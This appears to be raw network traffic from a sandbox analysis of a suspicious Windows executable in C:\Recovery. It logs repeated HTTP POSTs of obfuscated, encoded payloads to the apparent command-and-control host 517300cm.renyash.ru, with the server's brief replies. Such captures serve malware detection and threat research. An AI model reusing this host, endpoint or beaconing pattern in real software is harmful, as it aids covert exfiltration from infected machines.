Jan 9, 2025 18:12:23.040123940 CET	800	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOS2QpDmm3j33AuRx2D2eW5Dmx5Fb0Wn3NIzAFVuB7ufcOduQNsfKldFYpaWotj1ZFQwzX4ynZ4ZOeaSVLPvKnXn5NqtCK5wDqN%2FuUrtG6Xffj7lemI4TUK9Spy3YxteIadI0t2I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d4639f3431b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1780&rtt_var=707&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=752189&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:23.162596941 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:12:23.518791914 CET	1012	OUT	Data Raw: 55 55 5b 55 5d 47 50 54 59 58 51 54 5b 56 57 53 5f 5d 58 5f 52 53 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU[U]GPTYXQT[VWS_]X_RSZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )#?%>#X/#/\)\,!.%3-1+' ??:'\"/Y.,
Jan 9, 2025 18:12:23.694853067 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:23.854954958 CET	801	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w8buuU3YjGeeIx6qqhSAmxEdsjsUr5EvYiOCPmzGO8I8IReOjU7qcOcexAG9LrVOYIqk9Cwvha4F509oGJTZ4aN4W3%2BQx6cm9bl8Wu0AV8CJSqmh5SDoaZmghgIudajPIgtdzFTl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d4bbdf643df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6721&min_rtt=1651&rtt_var=10759&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=34588&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:23.973371983 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:24.332957983 CET	1012	OUT	Data Raw: 50 54 5e 5b 58 44 50 57 59 58 51 54 5b 5d 57 5c 5f 55 58 5a 52 5f 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT^[XDPWYXQT[]W\_UXZR_ZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z 3:7X=#$,(7"%(=(5$0=V&;4#/<'\"/Y.
Jan 9, 2025 18:12:24.426219940 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:24.688862085 CET	800	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=706YRO7Cg3OZtxBtyDFGWxCfiYAiJ1moV025hd762Ke7R7veHY7yxuCV8Y1KPy7Pq3GynC3TJ49DsqBKOfsT3sV09lyNK51g4l9waGuYAwhuJRyx6vSq8YBM%2FtNATdCnWqE4wK2J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d506b6e7cf6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4785&min_rtt=1981&rtt_var=6352&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=59789&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:24.923877001 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:25.268759966 CET	1012	OUT	Data Raw: 55 52 5b 5e 58 48 55 50 59 58 51 54 5b 52 57 54 5f 56 58 55 52 5c 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UR[^XHUPYXQT[RWT_VXUR\ZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )&4X=8/;7] %()$R6W%:%87X7?\('\"/Y.
Jan 9, 2025 18:12:25.368781090 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:25.626115084 CET	802	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OqaIif8ECmq5M8FhYUyPQVoHlS0s2eDEwnT3F4OgFjPW2mAXWnDhv1ZPh195ZZkOKTCJPI70HVdzo%2B2DzFo0BwyAW1p3myq9ioMDukdOOPMxhJwg8uhRi6eF5aulKB6ga%2B3f5Aa5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d564ed87c6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4100&min_rtt=2032&rtt_var=4899&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=78566&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:25.756087065 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:26.112626076 CET	1012	OUT	Data Raw: 50 5f 5b 54 58 44 50 52 59 58 51 54 5b 50 57 56 5f 57 58 5a 52 5b 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_[TXDPRYXQT[PWV_WXZR[ZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#=. :)0;7]##[>)0W!==V%-V&##Y8+'\"/Y.4
Jan 9, 2025 18:12:26.229671001 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:26.470099926 CET	802	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0SHucEHJYeoMNyqoGgIr7IMThHmyEOEa28NsqvJRcpsTCNuFLiflylC0RarcE111clvbJ6oHtXtPONsk%2B2j9WK5PYKorKSjbCRlMIqy9b35RxuA2zopVRX%2BKmPciJdJIM2jOSUW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d5baf7078dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4457&min_rtt=1988&rtt_var=5685&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=67138&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:26.608690977 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:26.956177950 CET	1012	OUT	Data Raw: 55 54 5b 55 5d 44 55 55 59 58 51 54 5b 51 57 53 5f 51 58 5a 52 53 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UT[U]DUUYXQT[QWS_QXZRSZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[+#.7))3#X-8# %/>5.5%3"287):'\"/Y.0
Jan 9, 2025 18:12:27.133966923 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:27.452833891 CET	804	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ia52y44uqx80IudCmghHGB3%2BZDGO2DhYHP0daQlKhOlHMoTH7zClgXSoU4ZHckttkoNBKpTMFeiDPIunC1JHBRbBnpEdR8kCem5K5g8B2Q1%2BxYMyNH2EhI92X%2BwW3aYHxPNaPxoM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d6148c942c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4534&min_rtt=1687&rtt_var=6327&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=59677&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:27.650122881 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:27.978261948 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:28.331053019 CET	1292	OUT	Data Raw: 50 5e 5b 5a 58 40 50 55 59 58 51 54 5b 51 57 52 5f 55 58 58 52 59 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^[ZX@PUYXQT[QWR_UXXRYZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_>&#,%>078+#Z %#^)90V5=%$#&1;7[#?('\"/Y.0
Jan 9, 2025 18:12:28.443140030 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:28.690781116 CET	953	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QN5P7P9AaGCDKW4XRM7qaM8CnjiMhSkEBUZuZc303CP1y0PZ8Km9bKfKTBaNjbpmfkPPNQkz%2FxgI%2BwK6HqlgQ%2FmwhmOR7eVEZviYPGY8NVSYDn9gwpPaZ6Mx2zYeTli2t8ClyKBE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d69798742f7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4827&min_rtt=1774&rtt_var=6771&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=55725&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 58 31 26 33 52 24 2c 37 57 31 32 2e 09 35 08 3e 5c 2e 3d 20 09 20 2a 27 5e 38 0c 3d 5a 22 2f 3b 5a 24 0b 2a 0b 26 12 23 18 35 1c 21 5d 01 12 27 05 33 17 3d 03 30 3d 30 5a 31 5e 2c 1b 20 2e 28 13 30 05 22 53 24 23 34 1e 22 5b 36 0d 28 3d 08 00 2d 2f 30 5e 3b 34 37 07 3c 03 2b 51 0e 10 22 1b 25 3d 39 00 2b 3e 23 11 26 54 2b 0d 3d 06 2f 10 26 02 30 1f 3d 3a 38 54 25 29 37 06 20 3c 2c 5e 3f 29 3b 04 27 38 22 08 29 28 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!X1&3R$,7W12.5>\.= '^8=Z"/;Z$&#5!]'3=0=0Z1^, .(0"S$#4"[6(=-/0^;47<+Q"%=9+>#&T+=/&0=:8T%)7 <,^?);'8")( \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:28.096930981 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:28.456125975 CET	1012	OUT	Data Raw: 50 52 5b 54 58 44 55 50 59 58 51 54 5b 52 57 5d 5f 5d 58 55 52 5f 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR[TXDUPYXQT[RW]_]XUR_ZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#* 5Y7>U?\,;04%))8R6>!&0.1+$ /]<:'\"/Y.
Jan 9, 2025 18:12:28.546715975 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:28.852660894 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zc9S3wjCDWdYEpQjWcrsWJcxs1DaGv%2BwCIyTSOrlks2eCTfc0kTZVa3drkMoSZAkpxuiKr7mu%2F5Y57VNUiftEt%2BgFPEO8JalzxF517uYkHRKL1EZrKCHqdIhlVaaAQRU9BXgmpCT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d6a2f91729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2350&min_rtt=1918&rtt_var=1585&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=271325&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:28.973207951 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:12:29.331095934 CET	1012	OUT	Data Raw: 55 54 5b 5c 58 45 55 52 59 58 51 54 5b 51 57 56 5f 52 58 5d 52 5f 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UT[\XEURYXQT[QWV_RX]R_ZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[397Z.=?Z8++X %#=\?6=:%3>2](#/<<'\"/Y.0
Jan 9, 2025 18:12:29.530031919 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:29.804415941 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jyvnoMokjXll8k1om629ZiImJDSvYDu%2Fig%2F5lqS6GCM4Xp5TlHC5r7A6pOoVwWUGz7zRROJp9PSjbVtHpF4I8bl1zC3eguY2MuDf1mevvIRjmlLtrTJKJ6JK%2FfHTdmXYdDsBqW5s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d704a1c1a44-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3525&min_rtt=2023&rtt_var=3763&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=103988&cwnd=130&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:30.289300919 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:30.643588066 CET	1012	OUT	Data Raw: 50 54 5b 54 5d 47 50 50 59 58 51 54 5b 57 57 5c 5f 51 58 55 52 59 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT[T]GPPYXQT[WW\_QXURYZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_=0) .X?/\44:S5-:239V$;4?#_('\"/Y.(
Jan 9, 2025 18:12:30.880928040 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:31.149405003 CET	809	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rMVnOXRhFtoxuJC6f8vO7xsHWdpeR9thSk2KJQuzFe8pKTS1C0ehqBCd%2FiEBnH4WYjQBwtSb%2FRJV2dJrtjKpHSdrgf%2BQvPKI8dL245EsnCHT3a0ICizDwrRrMRVYAcu54dlh%2F9GN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d78adcdefa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27123&min_rtt=20657&rtt_var=20678&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=20169&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:31.271294117 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:31.628072977 CET	1012	OUT	Data Raw: 50 55 5e 58 5d 42 50 55 59 58 51 54 5b 56 57 5d 5f 53 58 5d 52 58 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU^X]BPUYXQT[VW]_SX]RXZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[* =7>08/+3\757>'"!&3.1;04/<*'\"/Y.,
